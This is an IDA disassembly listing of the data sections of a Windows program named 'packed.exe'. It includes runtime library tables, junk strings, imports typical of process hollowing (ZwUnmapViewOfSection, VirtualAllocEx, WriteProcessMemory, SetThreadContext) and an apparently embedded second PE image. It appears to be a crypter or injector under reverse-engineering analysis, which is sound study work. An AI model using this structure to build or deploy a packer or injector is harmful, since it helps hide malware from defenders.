dword_4090C4 dd 77E775F1h ; DATA XREF: __ValidateEH3RN+131�r
; __ValidateEH3RN+196�r ...
dword_4090C8 dd 77E7F044h ; DATA XREF: __ValidateEH3RN+B3�r
; __resetstkoflw+1A�r ...
dword_4090CC dd 77F522F2h ; DATA XREF: __msize+30�r
; .text:00407FE8�r
dword_4090D0 dd 77E802FCh ; DATA XREF: ___security_init_cookie+43�r
; .text:00407FEE�r
dword_4090D4 dd 77E7751Ah ; DATA XREF: ___security_init_cookie+37�r
; .text:00407FF4�r
dword_4090D8 dd 77E77CC4h ; DATA XREF: ___security_init_cookie+2F�r
; .text:00407FFA�r
dword_4090DC dd 77E80656h ; DATA XREF: ___security_init_cookie+27�r
; .text:00408000�r
dword_4090E0 dd 77E6167Bh ; DATA XREF: ___security_init_cookie+1B�r
; .text:00408006�r
dword_4090E4 dd 77E70192h ; DATA XREF: __chsize+104�r
; .text:0040800C�r
dword_4090E8 dd 77E77405h ; DATA XREF: ___crtLCMapStringA+2C3�r
; ___crtLCMapStringA+344�r ...
dword_4090EC dd 77E77CCEh ; DATA XREF: ___crtLCMapStringA+C0�r
; ___crtLCMapStringA+141�r ...
dword_4090F0 dd 77E781F9h ; DATA XREF: ___crtLCMapStringA+27�r
; ___crtLCMapStringA+15B�r ...
dword_4090F4 dd 77E641EBh ; DATA XREF: ___crtGetStringTypeA+19C�r
; .text:00408024�r
dword_4090F8 dd 77E7C866h ; DATA XREF: ___crtGetStringTypeA+24�r
; ___crtGetStringTypeA+128�r ...
dword_4090FC dd 77E7513Ch ; DATA XREF: ___ansicp+20�r
; .text:00408030�r
dword_409100 dd 77E6169Ah ; DATA XREF: __resetstkoflw+D5�r
; .text:00408036�r
dword_409104 dd 77E7C3A5h ; DATA XREF: __resetstkoflw+2B�r
; .text:0040803C�r
align 10h
aHgfdhgfdhgfdHg db 'hgfdhgfdhgfd hgfdhgfdhgfd',0 ; DATA XREF: .data:off_40B044�o
align 4
; char aGfsjdkljSdjLsf[]
aGfsjdkljSdjLsf db 'gfsjdklj sdj lsfdjkl sjdfj skldjfsl jdkl fdgklfd',0
; DATA XREF: sub_401000+FA�o
align 10h
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_401592+5�o
align 4
aZwunmapviewofs db 'ZwUnmapViewOfSection',0 ; DATA XREF: sub_401592�o
align 4
; char aRb[]
aRb db 'rb',0 ; DATA XREF: WinMain(x,x,x,x)+33�o
align 4
stru_409188 _msEH <0FFFFFFFFh, offset loc_4021B1, offset loc_4021C5>
; DATA XREF: start+2�o __output+5E�r
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1�o
byte_4091B0 db 6 ; DATA XREF: __output:loc_402C51�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_40B064�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: .data:off_40B060�o
align 4
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_40B2EC�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+123�o
; ___security_error_handler+132�o
align 10h
; char asc_4095F0[]
asc_4095F0 db 0Ah ; DATA XREF: __NMSG_WRITE+107�o
; ___security_error_handler+FC�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5�o
db 0Ah
db 'Program: ',0
align 10h
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+C1�o
; ___security_error_handler+CC�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+8E�o
; ___security_error_handler+8B�o
byte_40962B db 0 ; DATA XREF: __wincmdln+1B�o
align 10h
stru_409630 _msEH <0FFFFFFFFh, offset loc_403FAD, offset loc_403FB1>
; DATA XREF: sub_403F80+2�o
align 10h
stru_409640 _msEH <0FFFFFFFFh, offset loc_403FF1, offset loc_403FF5>
; DATA XREF: sub_403FC4+2�o
dd 41h dup(0)
asc_409750: ; DATA XREF: .data:off_40B598�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
db 2 dup(0)
word_409952 dw 20h ; DATA XREF: .data:off_40B59C�o
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h, 0
stru_409B58 _msEH <0FFFFFFFFh, offset sub_405A6A, offset sub_405A6E>
; DATA XREF: sub_405A7E-2F�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2E�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+13�o
align 4
; char aProgram[]
aProgram db 'Program: ',0 ; DATA XREF: ___security_error_handler+108�o
align 10h
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: ___security_error_handler+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0
; DATA XREF: ___security_error_handler:loc_4070B2�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: ___security_error_handler+4C�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
; char aUnknownSecurit[]
aUnknownSecurit db 'Unknown security failure detected!',0
; DATA XREF: ___security_error_handler+47�o
align 4
stru_409D78 _msEH <0FFFFFFFFh, offset loc_40708D, offset loc_407091>
; DATA XREF: ___security_error_handler+5�o
dword_409D84 dd 0 ; DATA XREF: ___crtLCMapStringA+1C�o
; ___crtGetStringTypeA+1E�o
stru_409D88 _msEH <0FFFFFFFFh, offset loc_407691, offset loc_407695>
; DATA XREF: ___crtLCMapStringA+2�o
dd 0FFFFFFFFh, 40748Eh, 407492h, 0FFFFFFFFh, 40755Ch, 407560h
dd 0
stru_409DB0 _msEH <0FFFFFFFFh, offset loc_40782D, offset loc_407831>
; DATA XREF: ___crtGetStringTypeA+2�o
align 10h
stru_409DC0 _msEH <0FFFFFFFFh, offset loc_407AA5, offset loc_407AA9>
; DATA XREF: ___convertcp+2�o
align 10h
dd 48h, 0Eh dup(0)
dd offset dword_40B5A0
dd offset dword_409E20
dd 2, 2 dup(0)
dword_409E20 dd 414Ch, 6774h, 0 ; DATA XREF: .rdata:00409E10�o
dword_409E2C dd 2 dup(0) ; DATA XREF: sub_403F80+C�o
; sub_403F80:loc_403F93�o
dword_409E34 dd 0 ; DATA XREF: sub_403FC4+C�o
; sub_403FC4:loc_403FD7�o
dd 9E60h, 2 dup(0)
dd 0A404h, 9000h, 5 dup(0)
dd 9F6Ch, 9F7Eh, 9F92h, 9FA6h, 9FB8h, 9FCEh, 9FE0h, 9FF4h
dd 0A008h, 0A01Ch, 0A032h, 0A046h, 0A058h, 0A068h, 0A078h
dd 0A08Eh, 0A0A0h, 0A0B2h, 0A0C2h, 0A0CEh, 0A0DEh, 0A0EAh
dd 0A0F8h, 0A10Ch, 0A11Eh, 0A12Eh, 0A13Ch, 0A14Eh, 0A15Ah
dd 0A168h, 0A174h, 0A190h, 0A1AAh, 0A1C2h, 0A1DCh, 0A1F2h
dd 0A20Ch, 0A21Ah, 0A228h, 0A236h, 0A244h, 0A254h, 0A264h
dd 0A278h, 0A286h, 0A296h, 0A2A0h, 0A2ACh, 0A2B8h, 0A2C4h
dd 0A2DAh, 0A2EAh, 0A2F6h, 0A310h, 0A320h, 0A336h, 0A34Ch
dd 0A366h, 0A376h, 0A386h, 0A39Ch, 0A3ACh, 0A3BEh, 0A3D0h
dd 0A3E2h, 0A3F4h, 0
dd 6956037Ch, 61757472h, 6575516Ch, 78457972h, 2AC0000h
aReadprocessmem db 'ReadProcessMemory',0
dw 1CDh
aGetthreadconte db 'GetThreadContext',0
align 2
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 4
db 75h ; u
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 10h
db 77h ; w
db 1, 47h, 65h
aTmodulehandlea db 'tModuleHandleA',0
align 4
db 4Fh ; O
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 4
db 32h ; 2
db 3, 53h, 65h
aTthreadcontext db 'tThreadContext',0
align 4
db 9Dh ;
db 3, 57h, 72h
aIteprocessmemo db 'iteProcessMemory',0
align 2
dw 37Ah
aVirtualprotect db 'VirtualProtectEx',0
align 2
dw 374h
aVirtualallocex db 'VirtualAllocEx',0
align 4
db 0C5h ;
db 2, 52h, 65h
aSumethread db 'sumeThread',0
align 4
db 73h ; s
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 0Ch
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 1AFh
aGetstartupinfo db 'GetStartupInfoA',0
db 8
db 1, 47h, 65h
aTcommandlinea db 'tCommandLineA',0
dw 1DFh
aGetversionexa db 'GetVersionExA',0
dw 206h
aHeapalloc db 'HeapAlloc',0
dw 169h
aGetlasterror db 'GetLastError',0
align 2
dw 2A9h
aReadfile db 'ReadFile',0
align 2
aP db '',0
aExitprocess db 'ExitProcess',0
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 17h
db 3, 53h, 65h
aThandlecount db 'tHandleCount',0
align 2
dw 1B1h
aGetstdhandle db 'GetStdHandle',0
align 2
dw 15Eh
aGetfiletype db 'GetFileType',0
db 0Eh
db 3, 53h, 65h
aTfilepointer db 'tFilePointer',0
align 2
dw 20Ch
aHeapfree db 'HeapFree',0
align 2
a_ db '.',0
aClosehandle db 'CloseHandle',0
db 94h ;
db 3, 57h, 72h
aItefile db 'iteFile',0
db 60h ; `
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 10h
aA db '',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 14Dh
aGetenvironment db 'GetEnvironmentStrings',0
aU db '',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 87h ;
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 14Fh
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 4
db 0Ah
db 2, 48h, 65h
aApdestroy db 'apDestroy',0
dw 208h
aHeapcreate db 'HeapCreate',0
align 4
db 76h ; v
db 3, 56h, 69h
aRtualfree db 'rtualFree',0
dw 210h
aHeaprealloc db 'HeapReAlloc',0
db 2Ch ; ,
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 2Ah ; *
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db '',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 4
aM db 'M',0
aCreatefilea db 'CreateFileA',0
dw 248h
aLoadlibrarya db 'LoadLibraryA',0
align 2
dw 0F5h
aGetacp db 'GetACP',0
align 10h
db 8Bh ;
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 0FCh ;
align 2
aGetcpinfo db 'GetCPInfo',0
db 0CAh ;
db 2, 52h, 74h
aLunwind db 'lUnwind',0
db 1Fh
db 2, 49h, 6Eh
aTerlockedexcha db 'terlockedExchange',0
dw 37Bh
aVirtualquery db 'VirtualQuery',0
align 2
dw 212h
aHeapsize db 'HeapSize',0
align 2
dw 297h
aQueryperforman db 'QueryPerformanceCounter',0
db 0D5h ;
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 10h
db 3Eh ; >
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 13Bh
aGetcurrentproc db 'GetCurrentProcessId',0
db 0C0h ;
db 1, 47h, 65h
aTsystemtimeasf db 'tSystemTimeAsFileTime',0
dw 303h
aSetendoffile db 'SetEndOfFile',0
align 2
dw 23Ah
aLcmapstringa db 'LCMapStringA',0
align 2
dw 26Bh
aMultibytetowid db 'MultiByteToWideChar',0
dd 434C023Bh, 5370614Dh, 6E697274h, 5767h, 654701B2h, 72745374h
dd 54676E69h, 41657079h, 1B50000h, 53746547h, 6E697274h
dd 70795467h, 5765h, 6547016Ch, 636F4C74h, 49656C61h, 416F666Eh
dd 3790000h, 74726956h, 506C6175h, 65746F72h, 7463h, 654701BBh
dd 73795374h, 496D6574h, 6F666Eh, 4E52454Bh, 32334C45h
dd 6C6C642Eh
db 2 dup(0)
_rdata ends
; Section 3. (virtual address 0000B000)
; Virtual size : 000026B8 ( 9912.)
; Section size in file : 000026B8 ( 9912.)
; Offset to raw data for section: 0000B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 40B000h
dword_40B000 dd 0 ; DATA XREF: __cinit+45�o
dd offset ___security_init_cookie
dword_40B008 dd 0 ; DATA XREF: __cinit+4C�o
dword_40B00C dd 0 ; DATA XREF: __cinit+12�o
dd offset ___initstdio
dd offset ___onexitinit
dd offset ___initmbctable
dword_40B01C dd 0 ; DATA XREF: __cinit+17�o
dword_40B020 dd 0 ; DATA XREF: _doexit:loc_402672�o
dd offset ___endstdio
dword_40B028 dd 0 ; DATA XREF: _doexit+6C�o
dword_40B02C dd 0 ; DATA XREF: _doexit:loc_402691�o
dword_40B030 dd 4 dup(0) ; DATA XREF: _doexit+8B�o
; __int32 Offset
Offset dd 9404h ; DATA XREF: sub_401000+2C�r
; sub_401000+11A�r ...
; char *off_40B044
off_40B044 dd offset aHgfdhgfdhgfdHg ; DATA XREF: sub_401000+C�r
; sub_4012BE+10�r
; "hgfdhgfdhgfd hgfdhgfdhgfd"
align 10h
off_40B050 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_40B054 dd 2 ; DATA XREF: __NMSG_WRITE+58�r
; __FF_MSGBANNER+E�r ...
dword_40B058 dd 0FFFFFFFFh, 0A80h ; DATA XREF: __filbuf:loc_4022F2�o
; __flsbuf:loc_4058EC�o
off_40B060 dd offset aNull ; DATA XREF: __output:loc_402FDD�r
; __output+51C�r
; "(null)"
off_40B064 dd offset aNull_0 ; DATA XREF: __output+2D8�r
; "(null)"
off_40B068 dd offset dword_40C580 ; DATA XREF: .text:004033DF�o
; ___initstdio+52�o
align 10h
dd offset dword_40C580
dd 101h
dword_40B078 dd 0FFFFFFFFh, 0 ; DATA XREF: ___initstdio+71�o
dd 1000h, 0
; FILE stru_40B088
stru_40B088 FILE <3218EBh, 0F9Dh, 321888h, 0Ah, 0FFFFFFFFh, 0, 1000h, 0>
; DATA XREF: _printf+3�o __stbuf+12�o ...
dword_40B0A8 dd 3 dup(0) ; DATA XREF: __stbuf:loc_402A92�o
; __flsbuf+5B�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_40B0D8 dd 3, 0 ; DATA XREF: ___initstdio+9A�o
dd 1000h, 81h dup(0)
dword_40B2E8 dd 2 ; DATA XREF: ___initstdio+67�o
; __NMSG_WRITE:loc_4037B5�r ...
off_40B2EC dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5�r
; __NMSG_WRITE+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 409574h, 9, 409548h, 0Ah, 4094B0h, 10h, 409484h
dd 11h, 409454h, 12h, 409430h, 13h, 409404h, 18h, 4093CCh
dd 19h, 4093A4h, 1Ah, 40936Ch, 1Bh, 409334h, 1Ch, 40930Ch
dd 1Dh, 409268h, 78h, 409258h, 79h, 409248h, 7Ah, 409238h
dd 0FCh, 409234h, 0FFh, 409224h
dword_40B380 dd 0C0000005h, 0Bh, 0 ; DATA XREF: .text:0040396F�o
; __XcptFilter+C�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_40B3F8 dd 3 ; DATA XREF: __XcptFilter+84�r
dword_40B3FC dd 7 ; DATA XREF: __XcptFilter+89�r
dword_40B400 dd 0Ah ; DATA XREF: .text:_xcptlookup�r
; __XcptFilter+6�r
dword_40B404 dd 8Ch ; DATA XREF: __XcptFilter+B2�r
; __XcptFilter+BA�w ...
dd 10h, 0
dword_40B410 dd 1 ; DATA XREF: __dosmaperr:loc_40524A�r
dword_40B414 dd 16h ; DATA XREF: __dosmaperr:loc_40526E�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch, 2 dup(0)
off_40B580 dd offset __fptrap ; DATA XREF: __output+476�r
off_40B584 dd offset __fptrap ; DATA XREF: __output+4A2�r
dd offset __fptrap
off_40B58C dd offset __fptrap ; DATA XREF: __output+491�r
dd offset __fptrap
dd offset __fptrap
off_40B598 dd offset asc_409750 ; DATA XREF: __output:loc_402E01�r
; .text:00405A47�r ...
; " ((((( H"
off_40B59C dd offset word_409952 ; DATA XREF: .text:00405A41�r
dword_40B5A0 dd 0BC0B1144h ; DATA XREF: __output+E�r
; __NMSG_WRITE+E�r ...
align 10h
byte_40B5B0 db 1 ; DATA XREF: __setmbcp+120�r
db 2, 4, 8
align 8
dword_40B5B8 dd 3A4h ; DATA XREF: __setmbcp:loc_4065B9�r
dword_40B5BC dd 82798260h ; DATA XREF: __setmbcp+15C�r
dd 21h, 0
dword_40B5C8 dd 0DFA6h ; DATA XREF: __setmbcp+100�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_40B6A8 dd 19930520h, 5 dup(0) ; DATA XREF: .text:00406823�o
; __NLG_Notify+2�o
dd 1
dword_40B6C4 dd 1 ; DATA XREF: _wctomb+30�r
; __ismbcspace:loc_407DC2�r
dd 2Eh, 1, 4 dup(0)
byte_40B6E0 db 1Ch ; DATA XREF: sub_401000+65�o
; sub_401000+9B�r ...
align 4
dword_40B6E4 dd 0 ; DATA XREF: sub_4015BE+155�w
; WinMain(x,x,x,x)+F9�r
dword_40B6E8 dd 0 ; DATA XREF: sub_401592+1D�r
; sub_4015BE+64�w
byte_40B6EC db 0Ch ; DATA XREF: sub_401000+48�o
; sub_401000+7E�r ...
byte_40B6ED db 0Ah ; DATA XREF: sub_401000+72�o
; sub_401000+A8�r ...
align 10h
byte_40B6F0 db 4Dh ; DATA XREF: sub_401000+C0�o
; sub_4012BE+56�o
dword_40B6F1 dd 200505Ah ; DATA XREF: sub_401000+D6�r
; sub_401000+140�r ...
align 4
dd 0F0004h, 0FFFFh, 0B8h, 0
dd 1A0040h, 8 dup(0)
dd 100h, 0E0010BAh, 0CD09B41Fh, 4C01B821h, 909021CDh, 73696854h
dd 6F727020h, 6D617267h, 73756D20h, 65622074h, 6E757220h
dd 646E7520h, 57207265h, 32336E69h, 37240A0Dh, 22h dup(0)
dd 4550h, 7014Ch, 2A425E19h, 2 dup(0)
dd 818F00E0h, 1902010Bh, 3200h, 5200h, 0
dd 3E78h, 1000h, 5000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 0E8F4h, 400h, 0
dd 2, 100000h, 4000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 7000h, 274h, 0A000h, 48F4h, 0Ch dup(0)
dd 9000h, 18h, 0Ch dup(0)
aCode db 'CODE',0
align 10h
dd 4000h, 1000h, 3200h, 400h, 3 dup(0)
dd 60000020h, 41544144h, 0
dd 1000h, 5000h, 200h, 3600h, 3 dup(0)
dd 0C0000040h, 535342h, 0
dd 1000h, 6000h, 0
dd 3800h, 3 dup(0)
dd 0C0000000h, 6164692Eh, 6174h, 1000h, 7000h, 400h, 3800h
dd 3 dup(0)
dd 0C0000040h, 736C742Eh, 0
dd 1000h, 8000h, 0
dd 3C00h, 3 dup(0)
dd 0C0000000h, 6164722Eh, 6174h, 1000h, 9000h, 200h, 3C00h
dd 3 dup(0)
dd 50000040h, 7273722Eh, 63h, 48F4h, 0A000h, 4A00h, 3E00h
dd 3 dup(0)
dd 50000040h, 0Dh dup(0)
dd 0C000h, 0
dd 4A00h, 3 dup(0)
dd 50000040h, 1A5h dup(0)
byte_40C0E4 db 0F0h ; DATA XREF: sub_401000+55�o
; sub_401000+8E�r ...
align 4
dword_40C0E8 dd 0 ; DATA XREF: sub_401592+17�r
; sub_4015BE+6A�w
dword_40C0EC dd 0 ; DATA XREF: sub_4015BE+14D�w
; WinMain(x,x,x,x)+E9�r ...
dword_40C0F0 dd 0 ; DATA XREF: sub_4015BE+54�w
; sub_4015BE+86�w ...
; void *Memory
Memory dd 0 ; DATA XREF: start+11C�w
; __setenvp:loc_403B9B�r ...
dd 0
dword_40C0FC dd 0 ; DATA XREF: __amsg_exit�r
; .text:_fast_error_exit�r ...
dword_40C100 dd 0 ; DATA XREF: _ftell+8F�w
; _fseek:loc_401E5D�w ...
dword_40C104 dd 0 ; DATA XREF: __read+9B�w
; __read:loc_402522�w ...
dword_40C108 dd 0 ; DATA XREF: __sopen+149�r
dword_40C10C dd 2 ; DATA XREF: start+29�w ___heap_select�r ...
dword_40C110 dd 0A28h ; DATA XREF: start+49�w start+5A�w
dword_40C114 dd 501h ; DATA XREF: start+65�w
dword_40C118 dd 5 ; DATA XREF: start+32�w
; ___heap_select+9�r ...
dword_40C11C dd 1 ; DATA XREF: start+3A�w
dword_40C120 dd 1 ; DATA XREF: __setargv+8F�w
dword_40C124 dd 320B20h ; DATA XREF: __setargv+95�w
dd 0
; void *dword_40C12C
dword_40C12C dd 320B40h ; DATA XREF: __setenvp+48�w
; __setenvp:loc_403C3A�r ...
dd 3 dup(0)
off_40C13C dd offset aCM_unpackerPac ; DATA XREF: __setargv+37�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_40C144 db 0 ; DATA XREF: _doexit+2D�w
; ___endstdio+5�r
align 4
dword_40C148 dd 0 ; DATA XREF: _doexit+27�w
dword_40C14C dd 0 ; DATA XREF: _doexit+7�r _doexit+B0�w
dd 2 dup(0)
dword_40C158 dd 3 ; DATA XREF: __stbuf:loc_402A9D�w
; __openfile+14C�w ...
dword_40C15C dd 0 ; DATA XREF: __FF_MSGBANNER+21�r
dword_40C160 dd 0 ; DATA XREF: __XcptFilter+68�r
; __XcptFilter+73�w ...
align 8
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv+1C�o
; .data:off_40C13C�o
align 4
dd 3Ah dup(0)
byte_40C26C db 0 ; DATA XREF: __setargv+23�w
align 10h
dword_40C270 dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+2�r
; ___crtGetEnvironmentStringsA+24�w ...
dword_40C274 dd 0 ; DATA XREF: .text:004051CE�r
; .text:004051D3�w ...
dword_40C278 dd 0 ; DATA XREF: _malloc�r
; _calloc:loc_405B78�r ...
dword_40C27C dd 0 ; DATA XREF: __openfile+7�r
dword_40C280 dd 0 ; DATA XREF: ___crtMessageBoxA+9�r
; ___crtMessageBoxA+38�w ...
dword_40C284 dd 0 ; DATA XREF: ___crtMessageBoxA+4D�w
; ___crtMessageBoxA:loc_405FA4�r
dword_40C288 dd 0 ; DATA XREF: ___crtMessageBoxA+5B�w
; ___crtMessageBoxA+D6�r
dword_40C28C dd 0 ; DATA XREF: ___crtMessageBoxA+7B�w
; ___crtMessageBoxA:loc_405F5F�r
dword_40C290 dd 0 ; DATA XREF: ___crtMessageBoxA+6C�w
; ___crtMessageBoxA+9C�r
dword_40C294 dd 1 ; DATA XREF: .text:_getSystemCP�w
; .text:00406320�w ...
dword_40C298 dd 0 ; DATA XREF: __ValidateEH3RN:loc_4068C9�r
; __ValidateEH3RN+13F�r ...
align 10h
dword_40C2A0 dd 0 ; DATA XREF: __ValidateEH3RN:loc_4068DC�r
; __ValidateEH3RN+1C4�r ...
dd 0Fh dup(0)
dword_40C2E0 dd 3 dup(0) ; DATA XREF: __ValidateEH3RN+12C�o
; __ValidateEH3RN+191�o ...
; int dword_40C2EC
dword_40C2EC dd 0 ; DATA XREF: _wctomb:loc_4059EC�r
; ___crtLCMapStringA+265�r ...
dd 3 dup(0)
; int dword_40C2FC
dword_40C2FC dd 0 ; DATA XREF: _wctomb+41�r
; .text:0040634A�r ...
dd 0
dword_40C304 dd 0 ; DATA XREF: ___security_error_handler+17�r
; .text:004071A1�r ...
dword_40C308 dd 0 ; DATA XREF: __sopen+3D�r
dword_40C30C dd 1 ; DATA XREF: ___crtLCMapStringA+E�r
; ___crtLCMapStringA+31�w ...
dword_40C310 dd 1 ; DATA XREF: ___crtGetStringTypeA+E�r
; ___crtGetStringTypeA+2E�w ...
; int dword_40C314
dword_40C314 dd 0 ; DATA XREF: _setSBCS+1A�w
; _setSBUpLow+84�r ...
dword_40C318 dd 0 ; DATA XREF: _setSBCS+15�w
; __setmbcp+14D�w ...
align 10h
byte_40C320 db 0 ; DATA XREF: _setSBCS+6�o __setmbcp+A7�o ...
byte_40C321 db 0 ; DATA XREF: _parse_cmdline+47�r
; _parse_cmdline+11D�r ...
align 4
dd 0Fh dup(0)
